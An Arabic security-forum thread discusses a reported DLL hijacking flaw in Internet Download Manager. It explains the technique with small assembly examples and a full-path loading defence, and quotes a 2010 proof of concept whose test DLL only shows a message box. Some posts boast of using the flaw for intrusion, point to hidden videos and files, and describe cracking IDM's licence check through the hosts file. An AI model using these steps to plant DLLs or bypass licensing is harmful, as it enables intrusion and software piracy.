ثغره في برنامج Internet Download Manager أحتاج معلومات منكم

[protection]

السلام عليكم

تكلم احد الشباب في منتدى اخر عن ثغره في برنامج IDM

الداله المصابه

profapi

dwmapi
----------------

نوع الثغره

Dll Hijacking

الامتداد الا تشتغل عليه الثغره

bat,com,dll,exe,pif,scr,vbs

وراسلت الدعم الفني عنها .. ويحتاجون تفاصيل اكثر
وبما ان منتدى زيزوووم للامن والحمايه
فا من باب اولى يكون لديهم العلم بها

فاالي عنده معلومات عندها ومطلع في مواقع الهاكرز
يعطيني تفاصيل اكثر ياليت يكون فيه صور او فيديو
لتوضيح الثغره وكيف عملها ... لان الدعم الفني ينتظر
ونساعد في اغلاقها .

 

[أبو رمش]

تسلم أخي الكريم على هذا الطرح ..... و فعلا ستكون مشكلة كبيرة إذا كان فيه ثغرة لأن الأغلبية يعتمدون على هذا البرنامج أثناء تحميل الملفات ....
نرجوا من الأخوة الأفاضل و الذين لديهم الخبرة أن يفيدوننا عن مدى صحة هذا الكلام ...

 

[c.d]

البرنامج يحتوي على الوف السطور التي تحوي على الدوال
profapi
dwmapi

لو ذكرت السطر المصاب او حاول استيراد ملعومات من مكتشف الثغرة , وهل هي الثغرة local او remote اذا كانت ريموت مشكلة كبيرة ههه

بالتوفيق

 

[protection]

تسلم أخي الكريم على هذا الطرح ..... و فعلا ستكون مشكلة كبيرة إذا كان فيه ثغرة لأن الأغلبية يعتمدون على هذا البرنامج أثناء تحميل الملفات ....
نرجوا من الأخوة الأفاضل و الذين لديهم الخبرة أن يفيدوننا عن مدى صحة هذا الكلام ...

البرنامج يحتوي على الوف السطور التي تحوي على الدوال
profapi
dwmapi

لو ذكرت السطر المصاب او حاول استيراد ملعومات من مكتشف الثغرة , وهل هي الثغرة local او remote اذا كانت ريموت مشكلة كبيرة ههه

بالتوفيق

حسب الردود هناك

ثغرة dll بالداونلود مانجر بعد تسطيب البرنامج وتشغيله يشتغل الفايروس او ملف التجسس او اي ملف تحدده انت
والثغره موجوده من زمان ولا ترقعت للحين واستخدمتها مليون مره

 

[protection]

:\ أليست تلك الثغرة التي نفعله منها :0
ممكن - منع التعديل على مجلد البرنامج لكن هذا سوف يجعل تفعيله أصعب

عمل التكريك على الداونلود مانيجر يشبه كذلك عمل السبايويير عليه
الشركة فقط تكشف التفعيلات الغير قانونية ولاتقوم بغلق ثغراتها

اعتقد التفعيل يعدل على التطبيق نفسه IDN.EXE
ويتم قتل عمليه التحقق ويصبح التطبيق غير موقع رقمياً
والطريقه الاخرى من خلال ملف الهوست للويندوز
بادراج سيرفر التحقق ومنعه من الاتصال

 

[Mohammed43]

شكرا لك يالغالي على هالموضوع وان شاءالله يتم اكتشافها والابلاغ عنها
اما بخصوص التفعيل عن طريق ملف الهوست انا دايما افعل البرنامج بها وايضاء قبل قليل تم التفعيل بها لجهاز اخر والحمدالله شغال 100%100

 

[System32]

هلا فيك اخوي وليد ، الثغره هذي شبه قديمه ، واستعملتها في الاختراق ،دقايق ان شاء الله ، وانزلك الثغره والدال المصاب وطريقت عملها بشرح مفصل

برب ،،

 

[System32]

باااك ،،

بعد التجربه على الاصدار الجديد من البرنامج ، اصبحت الثغره لا تعمل ، يعني الحمد لله ، تم حل المشكله

بالتوفيق للجميع

 

[Mohammed43]

باااك ،،

بعد التجربه على الاصدار الجديد من البرنامج ، اصبحت الثغره لا تعمل ، يعني الحمد لله ، تم حل المشكله

بالتوفيق للجميع

ممكن تفيدنا الاصدار رقم كم؟

 

[System32]

ممكن تفيدنا الاصدار رقم كم؟

الاصدارات القديمه 6.17

موفق

 

[m0d!s@r7@n]

السلام عليكم

تكلم احد الشباب في منتدى اخر عن ثغره في برنامج IDM


وراسلت الدعم الفني عنها .. ويحتاجون تفاصيل اكثر
وبما ان منتدى زيزوووم للامن والحمايه
فا من باب اولى يكون لديهم العلم بها

فاالي عنده معلومات عندها ومطلع في مواقع الهاكرز
يعطيني تفاصيل اكثر ياليت يكون فيه صور او فيديو
لتوضيح الثغره وكيف عملها ... لان الدعم الفني ينتظر
ونساعد في اغلاقها .

اولا تحيه لصاحب الموضوع لفتحه مثل هذا الموضوع

-ذكر اخونا الفاضل ان الثغرات المكتشفه من نوع Dll Hijacking لذا لابد من معرفه بسيطه بهذا النوع من الثغرا ت

الكل يعلم عن مكتبات الربط الديناميكي (dll) ودورها في توفير الجهد في التعامل مع النظام , إذ يكفيك للتعامل مع النظام , أن تستدعي المكتبة والدوال الموجودة فيها , فعندما تريد أن تحذف ملفاَ , ستستدعي مكتبة Kernel32.dll وتقوم بإستدعاء دالة DeleteFile التي تقوم بحذف الملف الممرر لها , وعندما تريد الإتصال بمنافذ أو أجهزة أخرى , تقوم بتحميل مكتبة ws2_32 وإستدعاء الدوال الخاصة بالمقابس.

أغلب المكاتب تتواجد في مجلد النظام System32 كما هو معلوم , ويمكنك إرفاق المكتبة مع البرنامج في نفس المجلد في بعض الأحيان عندما لا تتوفر المكاتب في الأجهزة الأخرى , وهنا جاءت المشكلة!

فكرة الثغرة:
عندما تقوم بتحميل مكتبة إلى برنامجك , تقوم بإستدعاء دالة LoadLibraryA وتمرير اسم المكتبة لها بالشكل التالي:
كود PHP:
LoadLibraryA("user32")
سيقوم النظام بالبحث عن مكتبة user32 في نفس مجلد البرنامج أو ما يسمى بالـ Current Directory, إذا لم يجد , سيقوم بالإنتقال إلى المجلدات الموجودة في متغير PATH ويبحث عن المكتبة , ويقوم بتحميلها للذاكرة أو يقوم بإرجال قيمة 0 للدالة دلالة على عدم تحميل المكتبة ,

من هنا يمكننا فهم الفكرة , إذ أن وضع مكتبة خاصة بنا في نفس مجلد العمل للبرنامج , أو في مكان يتم فحصه قبل الSystem32 يؤدي إلى تحميل المكتبة الخاصة بنا بدلاَ من المكتبة الأصلية...

سؤال: إذا كانت الفكرة بهذه البساطة, لماذا لا يمكننا إستغلالها لكل البرامج؟ بوضع أي مكتبة يستعملها البرنامج في نفس مجلد العمل؟
يجب , كما ذكرت أن يقوم البرنامج بتحميل المكتبة عن طريق دالة LoadLibraryA , إذ أن وجود المكتبة في قائمة جدول الإستيراد Import Table سيقوم بتحميل المكتبة من مجلد الSystem32 أولاَ , بهذا تجد أنه لا يمكن إستغلالها , أيضاَ يجب أن لا تكون المكتبة قد تم تحميلها للذاكرة , فمثلاَ عندما تقوم بتحميل مكتبة user32 , المكتبة تحوي العديد من المكاتب التابعة لها في جدول الإستيراد , وسيتم تحميلهم معها ومن نفس مجلدها , بهذا تفشل الثغرة.

مثال:
لدينا هنا برنامج يريد إستدعاء adsnt.dll بعد تحميله عن طريق دالة LoadLibraryA , بالشكل التالي:
كود PHP:
format PE GUI 4.0

entry start include 'win32a.inc'
start: push _lib

call [LoadlibraryA] int 3

_lib db "adsnt",0

section '.idata' import data readable writeable

library kernel32,'kernel32.dll'
import kernel32, \ LoadlibraryA , 'LoadLibraryA'
عندما نقوم بتجربته في المنقح ونقوم بتشغيله , نلاحظ أن المكتبة قد تم تشغيلها وتم تحميل المكتبات المضمنة معها بشكل تام.

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

الآن نقوم بعمل dll بنفس الإسم ولنجعلها تقوم بعمل break وقت تشغيلها , على الشكل التالي:

كود PHP:
format PE GUI 4.0 DLL

entry DllEntryPoint include 'win32ax.inc'
.code

proc DllEntryPoint hinstDLL,fdwReason,lpvReserved

int 3

mov eax,5

ret

endp
نقوم بترجمتها وجعلها في نفس مجلد البرنامج, ونقوم بتسميتها بإسم adsnt.dll

نقوم بتشغيل البرنامج في المنقح , وننتظر النتيجة, ستجد أنه قد تم تحميل مكتبتنا بدل المكتبة الأصلية وهذا هو أساس الثغرة ككل...

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

سؤال: ماهي المشاكل التي تواجه مطور الثغرة؟ هل الثغرة تعتبر كاملة بالشكل السابق؟
مثالنا السابق يمثل معظم إستغلالات الثغرة لكن إذا أردت أن تقوم بعملك على أكمل وجه, ستضطر لمواجهة العديد من المشاكل. مثلاً إذا قمت بجعل مكتبتك تعمل بدل مكتبة أخرى , يجب أن تقوم بتحميل المكتبة الأصلية وتوفير الدوال التي توفرها هي للبرامج التي تستدعيها وإلا ستكشف على الفور, أي أن البرنامج إذا قام بإستدعاء
كود PHP:
GetProcAddress(handle,"SetWindowHookEx")
مثلاَ, سترجع الدالة بالقيمة 0 لإن مكتبتك لا تحوي دالة SetWindowHookEx فستظهر لجلب جميع دوال المكتبة و يتم عمل ذلك عن طريق تصدير دوال بنفس أسماء المكتبة وجعل دوالك كـ Proxy أو وسيط بينهم كما في الموضوع التالي من موقع CodeProject.

الموضوع يتحدث عن ما ذكرناه , إنشاء مكتبة وسيط بينك وبين المكتبة الأم , بتقليد كافة دوالها والقفز إلى الدوال الأصلية وقت الإستدعاء.

سؤال: هل الدوال هي كل ما توفره المكاتب؟
لا طبعاَ, إذ أن المكاتب توفر مصادر Resources وأشياء أخرى وإذا أردت أن تقوم بإستبدال المكتبة , يجب أن تقوم بمحاكاة.

سؤال: كيف أحمي برنامجي من أن يستغل بهذه الثغرة؟
كما رأينا فإن المشكلة العامة هي بعدم توفير المسار الكامل للنظام لكي يبحث عن المكتبة فيه , بهذا نستطيع القول أننا لم إستدعينا المكاتب بالشكل التالي مثلأَ:
كود PHP:
LoadLibraryA("c:\windows\system32\user32.dll")
فسنتجاوز أي مشكلة مع هذه الثغرة إن شاء الله.

كما هو واضح من هذا الشرح المبسط لهذا النوع من الاستغلال انه من ثغرات الويندوز نفسه لذا تقوم الميكروسوفت بترقيع اي ثغرات مكتشفه من هذا النوع

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

الامر الثاني

هل الدوال المذكوره بالموضوع ثغرات ل
برنامج Internet Download Manager

الكل يعرف ان هناك مواقع خاصه بالثغرات سواء مجانيه او مدفوعه ولكل الانظمه والتطبيقات الخ
الداله الاولي profapi لايوجد اي برنامج مشهور او مغمور به ثغره لهذه الداله
الداله الثانيه dwmapi فهي مشهوره جدا كثغره لعشرات البرامج والتطبيقات ومنها برامج حمايه (طبعا اصدارات قديمه)
السؤال هنا هل هذه الداله ثغره لبرنامج الداونلود حقيقه بحثت كثيرا بمواقع الثغرات ولم اجد هذه الداله ثغره لهذا البرنامج

الامر الثالث هل هناك ثغرات بالبرنامج من نوع Dll Hijacking
نعم هناك داله بالبرنامج مصابه بهذا النوع من الثغرات وهي
idmmkb.dll وهي مشهوره بمواقع الثغرات وقديمه وقد تم ترقيعها

اذن ما حقيقه امر هذه الثغرات التي بالموضوع
-اولا كما اشرت سالفا لا وجود لهذه الدوال بمواقع الثغرات
-لم اجد موقع خاص بالاختراق المتقدم عن طريق الثغرات فيه هذه الثغره
-الدعم الفني للبرنامج كما نبه اليه صاحب الموضوع لا يعلم بها رغم قدمها
-هذه الثغره لم اجدها الا في بعض المنتديات العربيه للاختراق وبعد متابعه الشروح الخاصه باستغلال هذه الثغره وجدت ان ما يقوم به الشارح مجرد تلغيم لا علاقه له باستغلال ثغرات علي الاطلاق
ارجو ان تكون الصوره صارت اكثر وضوحا
اعتذر عن عدم تنسيق الرد بالشكل اللائق اذ كتبته علي عجاله

 

[MagicianMiDo32]

ايه الكلام الجامد دا أمودي
بقى الواد بتاع الأيسكيورتي الي عامل شغل
نعم ثغرة الحقن بالربط الديناميكي قديمة ولم تعد تعمل منذ الأصدار6

 

[protection]

حياك جميعاً .. شاكر لكل من تفاعل بالموضوع
تم الرد من قبل الاعضاء هناك وتم ذكره نوعها

Exploit Title: [Dll Hijacking Exploit]
Application: [Internet Download Manager module(idmmkb.dll) Tonec Inc.]
Date: [07 Sept 2010]
Author: [STRELiTZIA]
Version: [All Internet Download Manager release]
Tested on: [Windows Xp, Vista, Windows 7]

De******ion:
------------
Internet Download Manager module(idmmkb.dll) is a monitor for special keys (Alt, Ctrl, etc.) and for mouse clicks on web links in Internet Browsers.
That allows other applications dynamic link libraries to execute malicious code without the users consent,
in the privilege context of the targeted application.

Instructions:
-------------
1- Copy "Test.dll" into %Internet Download Manager folder%
2- Rename "idmmkb.dll" to "idmmkb.dll_Original"
3- Rename "Test.dll" to "idmmkb.dll"

Perform this tests:
-------------------
- Restart your system.
- Try to run Windows Internet Explorer or Mozilla Firefox.
- Try to open you folders and links locate on your Desktop (My Computer, Recycle bin, My Documents and other...)
- Choose any Link property and click Find target.

Test Dll Delphi Source:
---//--
Library Test;
uses
Windows;

begin
MessageBoxA
(
0,
PChar('Yep, I''m running in your system without your permission'),
PChar('Sample'),
MB_ICONSTOP
);
end.
---//---
c) 2010 by STRELiTZIA

وهذا شرح فديو لثغرة مع تشغيل ملف الاختراق السيرفر...

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

ملفات الدلل المستخدمه

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

كلمات السر للملفات كلها
ANAS AL OTAiBi

وتمت مراسلة الشركة حول هذه .. وبنتظار ردهم
اذا لديكم اي تعقيب او اضافه .. ياليت يتم ذكرها
لان الشركة راح تعقب على رسالتي واحتاج معلومات اكثر
اذا كان هناك اي اضافة .

 

[protection]

باااك ،،

بعد التجربه على الاصدار الجديد من البرنامج ، اصبحت الثغره لا تعمل ، يعني الحمد لله ، تم حل المشكله

بالتوفيق للجميع

سبق وان راسلتهم عن دعم 32 اتصال بدلا 16 فقط مثل برنامج EagleGet
وتم اصداره في اخر تحديث .. ربما وقتها تم اصلاح الثغره السابقه

 

[protection]

اولا تحيه لصاحب الموضوع لفتحه مثل هذا الموضوع

-ذكر اخونا الفاضل ان الثغرات المكتشفه من نوع Dll Hijacking لذا لابد من معرفه بسيطه بهذا النوع من الثغرا ت

الكل يعلم عن مكتبات الربط الديناميكي (dll) ودورها في توفير الجهد في التعامل مع النظام , إذ يكفيك للتعامل مع النظام , أن تستدعي المكتبة والدوال الموجودة فيها , فعندما تريد أن تحذف ملفاَ , ستستدعي مكتبة Kernel32.dll وتقوم بإستدعاء دالة DeleteFile التي تقوم بحذف الملف الممرر لها , وعندما تريد الإتصال بمنافذ أو أجهزة أخرى , تقوم بتحميل مكتبة ws2_32 وإستدعاء الدوال الخاصة بالمقابس.

أغلب المكاتب تتواجد في مجلد النظام System32 كما هو معلوم , ويمكنك إرفاق المكتبة مع البرنامج في نفس المجلد في بعض الأحيان عندما لا تتوفر المكاتب في الأجهزة الأخرى , وهنا جاءت المشكلة!

فكرة الثغرة:
عندما تقوم بتحميل مكتبة إلى برنامجك , تقوم بإستدعاء دالة LoadLibraryA وتمرير اسم المكتبة لها بالشكل التالي:
كود PHP:
LoadLibraryA("user32")
سيقوم النظام بالبحث عن مكتبة user32 في نفس مجلد البرنامج أو ما يسمى بالـ Current Directory, إذا لم يجد , سيقوم بالإنتقال إلى المجلدات الموجودة في متغير PATH ويبحث عن المكتبة , ويقوم بتحميلها للذاكرة أو يقوم بإرجال قيمة 0 للدالة دلالة على عدم تحميل المكتبة ,

من هنا يمكننا فهم الفكرة , إذ أن وضع مكتبة خاصة بنا في نفس مجلد العمل للبرنامج , أو في مكان يتم فحصه قبل الSystem32 يؤدي إلى تحميل المكتبة الخاصة بنا بدلاَ من المكتبة الأصلية...

سؤال: إذا كانت الفكرة بهذه البساطة, لماذا لا يمكننا إستغلالها لكل البرامج؟ بوضع أي مكتبة يستعملها البرنامج في نفس مجلد العمل؟
يجب , كما ذكرت أن يقوم البرنامج بتحميل المكتبة عن طريق دالة LoadLibraryA , إذ أن وجود المكتبة في قائمة جدول الإستيراد Import Table سيقوم بتحميل المكتبة من مجلد الSystem32 أولاَ , بهذا تجد أنه لا يمكن إستغلالها , أيضاَ يجب أن لا تكون المكتبة قد تم تحميلها للذاكرة , فمثلاَ عندما تقوم بتحميل مكتبة user32 , المكتبة تحوي العديد من المكاتب التابعة لها في جدول الإستيراد , وسيتم تحميلهم معها ومن نفس مجلدها , بهذا تفشل الثغرة.

مثال:
لدينا هنا برنامج يريد إستدعاء adsnt.dll بعد تحميله عن طريق دالة LoadLibraryA , بالشكل التالي:
كود PHP:
format PE GUI 4.0

entry start include 'win32a.inc'
start: push _lib

call [LoadlibraryA] int 3

_lib db "adsnt",0

section '.idata' import data readable writeable

library kernel32,'kernel32.dll'
import kernel32, \ LoadlibraryA , 'LoadLibraryA'
عندما نقوم بتجربته في المنقح ونقوم بتشغيله , نلاحظ أن المكتبة قد تم تشغيلها وتم تحميل المكتبات المضمنة معها بشكل تام.

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

الآن نقوم بعمل dll بنفس الإسم ولنجعلها تقوم بعمل break وقت تشغيلها , على الشكل التالي:

كود PHP:
format PE GUI 4.0 DLL

entry DllEntryPoint include 'win32ax.inc'
.code

proc DllEntryPoint hinstDLL,fdwReason,lpvReserved

int 3

mov eax,5

ret

endp
نقوم بترجمتها وجعلها في نفس مجلد البرنامج, ونقوم بتسميتها بإسم adsnt.dll

نقوم بتشغيل البرنامج في المنقح , وننتظر النتيجة, ستجد أنه قد تم تحميل مكتبتنا بدل المكتبة الأصلية وهذا هو أساس الثغرة ككل...

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

سؤال: ماهي المشاكل التي تواجه مطور الثغرة؟ هل الثغرة تعتبر كاملة بالشكل السابق؟
مثالنا السابق يمثل معظم إستغلالات الثغرة لكن إذا أردت أن تقوم بعملك على أكمل وجه, ستضطر لمواجهة العديد من المشاكل. مثلاً إذا قمت بجعل مكتبتك تعمل بدل مكتبة أخرى , يجب أن تقوم بتحميل المكتبة الأصلية وتوفير الدوال التي توفرها هي للبرامج التي تستدعيها وإلا ستكشف على الفور, أي أن البرنامج إذا قام بإستدعاء
كود PHP:
GetProcAddress(handle,"SetWindowHookEx")
مثلاَ, سترجع الدالة بالقيمة 0 لإن مكتبتك لا تحوي دالة SetWindowHookEx فستظهر لجلب جميع دوال المكتبة و يتم عمل ذلك عن طريق تصدير دوال بنفس أسماء المكتبة وجعل دوالك كـ Proxy أو وسيط بينهم كما في الموضوع التالي من موقع CodeProject.

الموضوع يتحدث عن ما ذكرناه , إنشاء مكتبة وسيط بينك وبين المكتبة الأم , بتقليد كافة دوالها والقفز إلى الدوال الأصلية وقت الإستدعاء.

سؤال: هل الدوال هي كل ما توفره المكاتب؟
لا طبعاَ, إذ أن المكاتب توفر مصادر Resources وأشياء أخرى وإذا أردت أن تقوم بإستبدال المكتبة , يجب أن تقوم بمحاكاة.

سؤال: كيف أحمي برنامجي من أن يستغل بهذه الثغرة؟
كما رأينا فإن المشكلة العامة هي بعدم توفير المسار الكامل للنظام لكي يبحث عن المكتبة فيه , بهذا نستطيع القول أننا لم إستدعينا المكاتب بالشكل التالي مثلأَ:
كود PHP:
LoadLibraryA("c:\windows\system32\user32.dll")
فسنتجاوز أي مشكلة مع هذه الثغرة إن شاء الله.

كما هو واضح من هذا الشرح المبسط لهذا النوع من الاستغلال انه من ثغرات الويندوز نفسه لذا تقوم الميكروسوفت بترقيع اي ثغرات مكتشفه من هذا النوع

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

الامر الثاني

هل الدوال المذكوره بالموضوع ثغرات ل
برنامج Internet Download Manager

الكل يعرف ان هناك مواقع خاصه بالثغرات سواء مجانيه او مدفوعه ولكل الانظمه والتطبيقات الخ
الداله الاولي profapi لايوجد اي برنامج مشهور او مغمور به ثغره لهذه الداله
الداله الثانيه dwmapi فهي مشهوره جدا كثغره لعشرات البرامج والتطبيقات ومنها برامج حمايه (طبعا اصدارات قديمه)
السؤال هنا هل هذه الداله ثغره لبرنامج الداونلود حقيقه بحثت كثيرا بمواقع الثغرات ولم اجد هذه الداله ثغره لهذا البرنامج

الامر الثالث هل هناك ثغرات بالبرنامج من نوع Dll Hijacking
نعم هناك داله بالبرنامج مصابه بهذا النوع من الثغرات وهي
idmmkb.dll وهي مشهوره بمواقع الثغرات وقديمه وقد تم ترقيعها

اذن ما حقيقه امر هذه الثغرات التي بالموضوع
-اولا كما اشرت سالفا لا وجود لهذه الدوال بمواقع الثغرات
-لم اجد موقع خاص بالاختراق المتقدم عن طريق الثغرات فيه هذه الثغره
-الدعم الفني للبرنامج كما نبه اليه صاحب الموضوع لا يعلم بها رغم قدمها
-هذه الثغره لم اجدها الا في بعض المنتديات العربيه للاختراق وبعد متابعه الشروح الخاصه باستغلال هذه الثغره وجدت ان ما يقوم به الشارح مجرد تلغيم لا علاقه له باستغلال ثغرات علي الاطلاق
ارجو ان تكون الصوره صارت اكثر وضوحا
اعتذر عن عدم تنسيق الرد بالشكل اللائق اذ كتبته علي عجاله

بارك الله فيك على الاضافه
اليس الامر مشابه لما يحدث في برامج ادوبي
يستغل البرنامج لادخل او انشاء اتصال سيرفر
بحيث يكون يصعب على برنامج الحمايه اكتشافه او رصده
وتضطر الشركه لانزال تحديث دوري لسد هذه المشكلة ؟!

 

[m0d!s@r7@n]

حياك جميعاً .. شاكر لكل من تفاعل بالموضوع
تم الرد من قبل الاعضاء هناك وتم ذكره نوعها





وتمت مراسلة الشركة حول هذه .. وبنتظار ردهم
اذا لديكم اي تعقيب او اضافه .. ياليت يتم ذكرها
لان الشركة راح تعقب على رسالتي واحتاج معلومات اكثر
اذا كان هناك اي اضافة .

ذكرت لك اخي انفا في ردي ان هذه الثغره هي المعروفه للبرنامج من هذا النوع وموجوده علي جميع مواقع الثغرات ولكن لا تمثل خطر كبير اذ هذا النوع من الثغرات لا يكون الا local وتم ترقيعها

 

[m0d!s@r7@n]

بارك الله فيك على الاضافه
اليس الامر مشابه لما يحدث في برامج ادوبي
يستغل البرنامج لادخل او انشاء اتصال سيرفر
بحيث يكون يصعب على برنامج الحمايه اكتشافه او رصده
وتضطر الشركه لانزال تحديث دوري لسد هذه المشكلة ؟!

بالنسبه لثغرات برامج ادوبي فحدث ولا حرج
جميع انواع الثغرات والاستغلالات تجدها في منتجات ادوبي
شركه عملاقه رائده نعم ولكن نظام امني سئ للغايه كل فتره تخترق اختراقات كبيره تصل الي حد الحصول علي حسابات ملايين العملاء والسورس كود الخاص بكثير من برامجها

 

[أبو رمش]

أتوقع بأن الثغرات موجودة في أغلب البرامج لكن لا تتضح إلا في البرامج الشائعة و الأكثر استخداما .... فمثلا نرى الآن تشفيرات على بعض برامج الحماية بحيث لا تستطيع أن تكتشفها ألا يعد هذا التشفير الدخول من ثغرة من ثغرات البرنامج .....

 

[m0d!s@r7@n]

أتوقع بأن الثغرات موجودة في أغلب البرامج لكن لا تتضح إلا في البرامج الشائعة و الأكثر استخداما ....

كلام صحيح فالثغرات موجوده بجميع الانظمه والبرامج والشبكات والتطبيقات الخ

فمثلا نرى الآن تشفيرات على بعض برامج الحماية بحيث لا تستطيع أن تكتشفها ألا يعد هذا التشفير الدخول من ثغرة من ثغرات البرنامج .....

الثغرات اخطاء برمجيه يتم استغلالها اما التشفير فهو عمل تعميه وتغطيه للاكواد الخبيثه لملف ما

 

[أبو عائشهأبو عائشه is verified member.]

موضوع رائع ومتابعة جيدة

تسلم الأيادي أخي وليد